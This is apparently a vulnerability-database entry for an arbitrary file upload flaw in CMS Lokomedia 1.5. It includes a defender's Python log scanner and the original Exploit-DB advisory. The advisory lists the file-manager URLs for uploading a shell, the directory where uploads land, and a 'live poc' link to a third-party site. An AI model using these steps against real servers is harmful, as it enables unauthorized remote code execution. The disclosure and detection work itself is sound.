Vendor: CMS Lokomedia
By: eidelweiss
CVSS: 8.8 (HIGH)
Vulnerability type: Arbitrary file upload
CWE: 434
Product Name: CMS Lokomedia
Affected Version From: 1.5
Affected Version To: 1.5
Patch Exists: YES
Related CWE: N/A
CPE: a:bukulokomedia:cms_lokomedia
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011

CMS Lokomedia 1.5 Arbitrary file upload vulnerability

CMS Lokomedia 1.5 contains an arbitrary file upload flaw (CWE-434). The bundled 'tinymcpuk' file manager page 'tinymcpuk/filemanager/browser.html' lets an attacker upload files of their choosing to the server, including server-side scripts, which can then be used to gain access to the host. Uploaded files are written to the 'lokomedia/tinymcpuk/gambar' directory, which the web server serves directly. Exploitation consists of sending a specially crafted HTTP upload request to the vulnerable page.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to upgrade to the latest version of CMS Lokomedia.
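As an added example (not part of the advisory or the vendor's code), the following Python snippet shows how a defender can spot this class of abuse in web-server access logs: it flags requests to the file-manager pages named above and successful requests for server-side scripts under the 'tinymcpuk/gambar' upload directory, and correlates the two by client IP. The log lines, IPs, file names and the script-extension list are constructed assumptions for the demonstration.

```python
import re

# Constructed Apache combined-format log lines for demonstration (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2011:10:01:02 +0000] "GET /lokomedia/tinymcpuk/filemanager/browser.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2011:10:01:09 +0000] "GET /lokomedia/tinymcpuk/filemanager/frmupload.html HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2011:10:01:15 +0000] "GET /lokomedia/tinymcpuk/gambar/x.php HTTP/1.1" 200 87 "-" "Mozilla/5.0"
198.51.100.4 - - [12/Mar/2011:10:02:30 +0000] "GET /lokomedia/tinymcpuk/gambar/logo.jpg HTTP/1.1" 200 9031 "-" "Mozilla/5.0"
"""

# Minimal parser for the combined log format: client IP, timestamp, method, path, status.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Any hit on the file-manager pages named in the advisory.
FILEMANAGER_RE = re.compile(r'/tinymcpuk/filemanager/', re.I)
# A server-side script inside the image upload directory; the extension list is an assumption,
# tune it to whatever the web server actually hands to an interpreter.
UPLOAD_DIR_SCRIPT_RE = re.compile(r'/tinymcpuk/gambar/[^?]*\.(php\d?|phtml|phar)(\?|$)', re.I)


def scan(log_text):
    """Return (alerts, correlated_ips).

    alerts: list of (kind, ip, path) for every suspicious request.
    correlated_ips: IPs that touched the file manager and later fetched a script
    from the upload directory with HTTP 200, the strongest signal of a planted file.
    """
    alerts = []
    touched_filemanager = set()
    correlated = set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, path, status = m['ip'], m['path'], m['status']
        if FILEMANAGER_RE.search(path):
            alerts.append(('filemanager-access', ip, path))
            touched_filemanager.add(ip)
        elif UPLOAD_DIR_SCRIPT_RE.search(path) and status == '200':
            alerts.append(('script-in-upload-dir', ip, path))
            if ip in touched_filemanager:
                correlated.add(ip)
    return alerts, correlated


if __name__ == '__main__':
    found, ips = scan(SAMPLE_LOG)
    for kind, ip, path in found:
        print(f'{kind:22} {ip:15} {path}')
    print('correlated clients:', sorted(ips))
```

A periodic directory listing of 'tinymcpuk/gambar' for anything that is not an image is a cheap complementary check on the host itself.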

Exploit-DB raw data:

===================================================================
    CMS Lokomedia 1.5 Arbitrary file upload vulnerability
===================================================================
   
Software:   CMS Lokomedia
Vendor:     http://bukulokomedia.com/home
Vuln Type:  Arbitrary file upload
Download link:  http://bukulokomedia.com/lokomedia-1.5.rar
Author:     eidelweiss
contact:    eidelweiss[at]windowslive[dot]com
Home:       www.eidelweiss.info
DORK:	use your skill and play your imagination :P

Gratz:
- Kuris : your status is already married, babe.. and you didn't even invite us..
- Richie : RebelgiRL (Limited edition.. lol) life is never flat so enjoy this life mate ^_^


References: http://eidelweiss-advisories.blogspot.com/2011/03/cms-lokomedia-15-arbitary-file-upload.html
   
   
===================================================================
 

----------------------------------
 
    exploit & p0c

[!] http://host/path_to_lokomedia/tinymcpuk/filemanager/browser.html	// upload your file here
		or
[!] http://host/tinymcpuk/filemanager/browser.html
    or
[!] http://host//tinymcpuk/filemanager/frmupload.html
    or
[!] http://host/path_to_lokomedia/tinymcpuk/filemanager/frmupload.html
 
    your shell or file will be placed here
 
/*------------------------------------------------------------------------------*/
/* Path to user files relative to the document root (no trailing slash)		*/
/*------------------------------------------------------------------------------*/
$fckphp_config['UserFilesPath'] = "./lokomedia/tinymcpuk/gambar" ;			// <= here 
/*==============================================================================*/
/* Once the site is online, change line 47 to the following setting:
$fckphp_config['UserFilesPath'] = "./tinymcpuk/gambar" ; */				// <= or here

----------------------------------

	live poc : http://www.ikafela.com./tinymcpuk/filemanager/browser.html
   
   
====================================================================
   
    Nothing Impossible In This World Even Nobody's Perfect
   
===================================================================
   
==========================| -=[ E0F ]=- |==========================